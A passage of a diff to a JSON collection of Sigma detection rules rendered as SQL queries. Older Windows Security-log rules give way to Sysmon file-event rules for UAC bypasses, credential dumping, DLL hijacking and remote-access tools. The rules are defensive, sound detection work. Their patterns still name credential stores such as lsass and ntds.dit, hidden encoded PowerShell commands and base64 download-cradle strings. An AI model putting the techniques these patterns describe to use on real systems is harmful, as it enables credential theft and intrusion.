'%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent 
LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_susp_creation_by_mobsync.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" + "attack.t1548.002" ], "falsepositives": [ - "SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId 
= '0x3e7'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Transferring Files with Credential Data via Network Shares", - "id": "910ab938-668b-401b-b08c-b596e80fdca5", - "status": "test", - "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", + "status": "experimental", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. 
(See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.001", - "attack.t1003.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Transferring sensitive files for legitimate administration work by legitimate administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "Anydesk Temporary Artefact", + "id": "0b9ad457-2554-44c1-82c2-d56a99c42377", "status": "test", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, 
AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", "attack.command_and_control", - "attack.t1071.004" + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_anydesk_artefact.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + 
"attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "status": "test", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "Locked Workstation", - "id": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", - "status": "stable", - "description": "Automatically lock workstation sessions after a standard period of 
inactivity.\nThe case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", - "author": "Alexandr Yampolskyi, SOC Prime", + "title": "UAC Bypass Using IEInstal - File", + "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4800')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_workstation_was_locked.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", - "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "title": "SCR File Write Event", + "id": "c048f047-7e2a-4888-b302-55f509d4a91d", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the creation of screensaver files (.scr) outside of system folders. 
Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "The installation of new screen savers by third party software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" + "filename": "file_event_win_new_src_file.yml" }, { - "title": "Group Modification Logging", - "id": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", - "status": "stable", - "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows 
Server 2000, Windows 2003 and XP.\n", - "author": "Alexandr Yampolskyi, SOC Prime", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "status": "experimental", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ], "falsepositives": [ - "Unknown" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4728', '4729', '4730', '633', '632', '634'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_security_group_modification_logging.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "AD User Enumeration", - "id": "ab6bffca-beff-4baa-af11-6733f296d57a", - "status": "test", - "description": "Detects access to a domain user from a non-machine account", - "author": "Maxime Thiebaut (@0xThiebaut)", + "title": "Suspicious File Drop by Exchange", + "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "status": "experimental", + "description": "Detects suspicious file type dropped by an Exchange component in IIS", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.persistence", + "attack.t1190", + "attack.initial_access", + "attack.t1505.003" ], "falsepositives": [ - "Administrators configuring new users." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_ad_user_enumeration.yml" + "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" }, { - "title": "CobaltStrike Service Installations - Security", - "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "Suspicious VHD Image Download From Browser", + "id": "8468111a-ef07-4654-903b-b863a80bbc95", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Legitimate downloads of \".vhd\" files would also trigger 
this" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\safari.exe' ESCAPE '\\' OR Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_mal_vhd_download.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", "status": "experimental", - "description": "Detect priv users or groups 
recon based on 4661 eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects 
files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", - "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": "experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1136.001" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = 
'4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_hidden_user_creation.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "VSSAudit Security Event Source Registration", - "id": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", "status": "experimental", - "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." 
+ "Unknown" ], - "level": "informational", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND AuditSourceName = 'VSSAudit' AND EventID IN ('4904', '4905'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_vssaudit_secevent_source_registration.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": 
"win_security_impacket_secretdump.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", - "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE 